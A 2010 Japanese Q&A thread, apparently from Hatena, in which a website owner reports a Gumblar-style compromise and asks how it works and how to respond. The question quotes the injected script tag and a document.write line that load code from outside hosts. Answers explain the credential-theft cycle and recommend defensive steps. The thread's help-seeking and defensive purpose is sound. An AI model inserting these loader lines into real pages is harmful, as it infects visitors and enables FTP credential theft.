自サイトをgoogleで検索すると

「このサイトはコンピュータに損害を与える可能性があります。」と
出てしまい、ホームページのソースを調べてみると
ヘッダタグとボディタグの間に組み込まれている(通常はありえない)
<script src=http://koispot.com/stagingdrupal/indexi.php ></script>
が見つかりました。

上記サイトに実際に行ってみましたが、
//
と表示されるだけですが、ソースは

//<script>
document.write("<script src=http://jumrea.co.kr/rootboard/data/uploaded/egvaa.php><\/script>");
//</script>

となっており、
そのパソコンにあるデータをいろいろと盗むためのものかもしれないな、など
と思っています。(上記URLには行っていない)

こうしたものがどのような仕組みになっているのかを教えてください。

また、対策は、私がとったように、ただ
<script src=http://koispot.com/stagingdrupal/indexi.php ></script>
をサイトから削除するだけでいいのか、を教えてください。

また、もしかしたら、自分のパソコンに入っていた、いろいろなファイルや
パスワードなどが、盗まれているのではないか、と心配しているのですが、
そのあたりも教えてください。

回答の条件
  • 1人2回まで
  • 登録:2010/03/02 10:00:22
  • 終了:2010/03/05 13:36:40

回答(7件)

id:km1967 No.1

km1967回答回数541ベストアンサー獲得回数402010/03/02 10:15:23

ポイント20pt

Gumblarに感染したかもしれません。

  1. 当該サイトを直ちに停止する
  2. 当該サイトを更新するのに使うPCのLANケーブルを外し、ウイルスチェックを行う
  3. 少なくともサイト更新のためのFTPパスワードは盗まれている。他にも情報が盗まれている可能性が高いので、すべてのパスワードを変更すること

http://www.lac.co.jp/info/alert/alert20091119.html

id:kensan929 No.2

kensan929回答回数15ベストアンサー獲得回数02010/03/02 10:34:22

ポイント20pt

あらら(^^;)

ガンブラーウィルスに感染してしまった恐れがあります。


ガンブラーウィルスとは?

http://www.nca.gr.jp/2010/netanzen/index.html


私も同様の被害に合いました。


おそらくは質問者さんのHPのindex.htmlやjsファイルに感染してしまったのではないでしょうか?


このウィルスによる影響としては、FTPのIDとパスを盗まれる危険性があります。


駆除方法としては、ソースそのものを消してしまうのが手っ取り早いですが、

また感染する恐れがあります。


WinSCPというプラグインを使うことにより、FTPのIDとパスを暗号化してしまうため盗まれる危険性はなくなります。

WinSCP導入マニュアル

http://www.cc.tsukuba.ac.jp/WinSCP/


もし、検討違いでありましたら申し訳ございませんm(__)m


http://happiness-comic.com/

URL:ダミー

id:juramo No.3

juramo回答回数57ベストアンサー獲得回数12010/03/02 10:41:04

ポイント20pt

今でも流行っているのかは分かりませんが、

パソコンの中に入っているウィルスが

勝手にhtmlのタグを書き加えてしまうという、というものが大流行してました。


そのままサイトを放置したままだと、見た人にどんどん広がってしまうので

ウイルスの疑いがあるのならば、まずは一度サーバーからホームページを下ろすことをオススメします。


ホームページウイルスチェックで引っかかるようであれば、

まずは自分のパソコン内のウイルスチェックをして

既に感染してしまったサイトについては、

おそらくパソコン自体が感染していれば、<script src=http://koispot~を消しても

また書き換えられてしまうことが考えられますので

ご自身の使用されている、ウィルス対策ソフトのホームページなどで相談することがよいかと思います。

(市販されている大手のソフトなどでしたら、ちゃんと相談にのってもらえます)



できる限りお早めに対処されたほうがいいかと思います。

id:pioneer_skies No.4

はてな回答回数2ベストアンサー獲得回数02010/03/03 11:44:43

ポイント20pt

私も同様の目にあいましたね。

海外のレンタルサーバーを借りてましたが。

なぜかFireFoxではダメでも、IEでは大丈夫ということもありました。

私がとった作戦はずばり、

サーバーごと解約です。

国内のサーバーにすべて移しました。

直そうとか思わない方がいいですよ。

もうサーバー内のファイルに関しては諦めた方がいいと思います。

id:ao-can No.5

ao-can回答回数1ベストアンサー獲得回数02010/03/04 15:05:39

ポイント10pt

ネットウイルスの可能性があると思います((汗

何とか対処したほうが良いかと....

ネットは色々ありますからね...(((←

id:yusuke_818 No.6

ドナルド回答回数34ベストアンサー獲得回数02010/03/04 19:35:56

今でも流行っているのかは分かりませんが、

パソコンの中に入っているウィルスが

勝手にhtmlのタグを書き加えてしまうという、というものが大流行してました。



そのままサイトを放置したままだと、見た人にどんどん広がってしまうので

ウイルスの疑いがあるのならば、まずは一度サーバーからホームページを下ろすことをオススメします。



ホームページウイルスチェックで引っかかるようであれば、

まずは自分のパソコン内のウイルスチェックをして

既に感染してしまったサイトについては、

おそらくパソコン自体が感染していれば、<script src=http://koispo~を消しても

また書き換えられてしまうことが考えられますので

ご自身の使用されている、ウィルス対策ソフトのホームページなどで相談することがよいかと思います。

(市販されている大手のソフトなどでしたら、ちゃんと相談にのってもらえます)




できる限りお早めに対処されたほうがいいかと思います。今でも流行っているのかは分かりませんが、

パソコンの中に入っているウィルスが

勝手にhtmlのタグを書き加えてしまうという、というものが大流行してました。



そのままサイトを放置したままだと、見た人にどんどん広がってしまうので

ウイルスの疑いがあるのならば、まずは一度サーバーからホームページを下ろすことをオススメします。



ホームページウイルスチェックで引っかかるようであれば、

まずは自分のパソコン内のウイルスチェックをして

既に感染してしまったサイトについては、

おそらくパソコン自体が感染していれば、<script src=http://koispot~を消しても

また書き換えられてしまうことが考えられますので

ご自身の使用されている、ウィルス対策ソフトのホームページなどで相談することがよいかと思います。

(市販されている大手のソフトなどでしたら、ちゃんと相談にのってもらえます)




できる限りお早めに対処されたほうがいいかと思います。

id:ishibata

再度の御送信になっています

2010/03/05 13:35:11
id:DreamHope No.7

DreamHope回答回数2ベストアンサー獲得回数02010/03/05 13:11:23

ポイント30pt

「Web サイトが改ざんされ、意図しない JavaScript を埋め込まれる事象」はとてもガンブラーの挙動によく似ています。

この挙動がガンブラーという前提で、質問にお答えします。


> こうしたものがどのような仕組みになっているのかを教えてください。

卵が先か鶏が先かという問題はありますが、順を追って説明します。

1、Webサイトのhtmlファイル等を書き換え、別途Webサイトに誘導します。

2、そのWebサイトにて、各種ソフトウェアの脆弱性を突いてマルウェアをダウンロードさせ感染させます。

  現時点で判明している「脆弱性のある各種ソフトウェア」

  ・Microsoft Windows

  ・Adobe Acrobat

  ・Adobe Flash Player

  ・Adobe Reader

  ・Java(JRE)

3、感染したマルウェアが「各種Windows上FTPソフトウェアの登録データ」や「ブラウザのアカウント情報」の窃取やネットワークに流れるパケットをFTPログイン情報を盗聴し、情報収集した結果を外部の情報収集用サーバに送ります。

  現時点で判明している「登録データを窃取されるWindows上FTPソフトウェア」

  ・ALFTP 5.2 beta1

  ・BulletPloof FTP Client 2009.72.0.64

  ・EmFTP 2.02.2

  ・FFFTP 1.96d

  ・FileZilla 3.3.1

  ・FlashFXP 3.6

  ・Frigate 3.36

  ・FTP Commander 8

  ・FTP Navigator 7.77

  ・FTP Now 2.6.93

  ・FTP Rush 1.1b

  ・SmartFTP 4.0.1072.0

  ・Total Commander 7.50a

  ・UltraFXP 1.07

  ・WinSCP 4.2.5

  現時点で判明している「アカウント情報を窃取されるブラウザ」

  ・Microsoft Internet Explorer 6

  ・Opera 10.10

  現時点で推察できる窃取やパケット盗聴され、外部サーバに送られる情報=FTPアカウント情報

  ・「FTPサーバのホスト名」「ログインID」「パスワード」

4、情報収集用サーバに集まったFTPアカウント情報を元にして、正規FTPユーザになりすましFTPサーバにアクセスします。

5、1に戻ります。

このような一連の挙動を指して「ガンブラー」と呼んでいます。


> サイトから削除するだけでいいのか、を教えてください。

削除すれば、現時点での2次感染を防ぐことはできますが、再度別途Webサイトへ誘導するhtmlファイル等を置かれてしまう恐れがあり、根本的解決にはなりませんので、答えとしてはそれでは駄目です。


> また、もしかしたら、自分のパソコンに入っていた、いろいろなファイルやパスワードなどが、盗まれているのではないか、と心配しているのですが、そのあたりも教えてください。

現時点において確認されている窃取や盗聴されている情報は前述の通りFTPアカウント情報になります。

ただし、ガンブラーはウィルスやマルウェアを指すのではなく、一連の挙動を指しておりますので、マルウェアが異なれば窃取や盗聴する情報も変わります。

メールのプロトコルであるPOP3も「メール本文」や「メールサーバ名」、「ログインID」、「パスワード」等を暗号化せずに平文(テキスト)の状態のパケットでネットワーク上を流れていますのでこれもターゲットにされる可能性はあります。

各種Windows上FTPソフトウェアの登録データを窃取できることから、ファイルやレジストリの読み込みが可能なマルウェアも動作しておりますので、実質上アクセスできる全てのファイル、つまり何でも盗むことは可能ですし、もうすでに盗まれている可能性も大だと思っていただいて構いません。

重要な顧客情報等があった場合は、それを元に「その情報を漏洩させる代わりに金銭の要求する」等の動きが今後出てくる可能性があります。

また、ウィルス駆除ソフトではほとんどマルウェアの感染を防ぐことはまずできません。

新しいマルウェアは続々と生まれており、パターン検索型では追いつかないのが現状のようです。

感染し情報を奪い取られた随分後で感染したことが判明し駆除することができる程度です。

ですので、もっと根本的な対策をお勧めします。

詳しい対策を知りたいのでしたら、私の個人的指向が強いサイトで申し訳ありませんが、

http://www.dreamhope.net/soliloquies/accesscheck/

http://www.dreamhope.net/soliloquies/LAMP10.04/

等で考え方や対応策なども掲載しておりますので、(長文で申し訳ありませんが)参考にしてみてください。

最後にkensan929さんがお勧めされている「WinSCP」も「登録データを窃取されるWindows上FTPソフトウェア」に含まれますのでご注意ください。

参考URL:https://www.jpcert.or.jp/at/2010/at100005.txt

id:ishibata

ありがとうございました。

まだまだ道のりは長いですが、対策をとってみます。

2010/03/05 13:33:58

この質問への反応(ブックマークコメント)

トラックバック

  • 2010年2月 「Gumblar.x」の改ざん攻撃再開 無題なブログ 2010-03-02 23:12:24
       去年の2009年10月に始まって、12月に攻撃者自ら撤退していた「&#039;&#039;&#039;Gumblar.x&#039;&#039;&#039;」の改ざん攻撃が、2010年2月4日に再開しました。12月の段階で改ざん被害を受けて不正な
「あの人に答えてほしい」「この質問はあの人が答えられそう」というときに、回答リクエストを送ってみてましょう。

これ以上回答リクエストを送信することはできません。制限について

絞り込み :
はてなココの「ともだち」を表示します。
回答リクエストを送信したユーザーはいません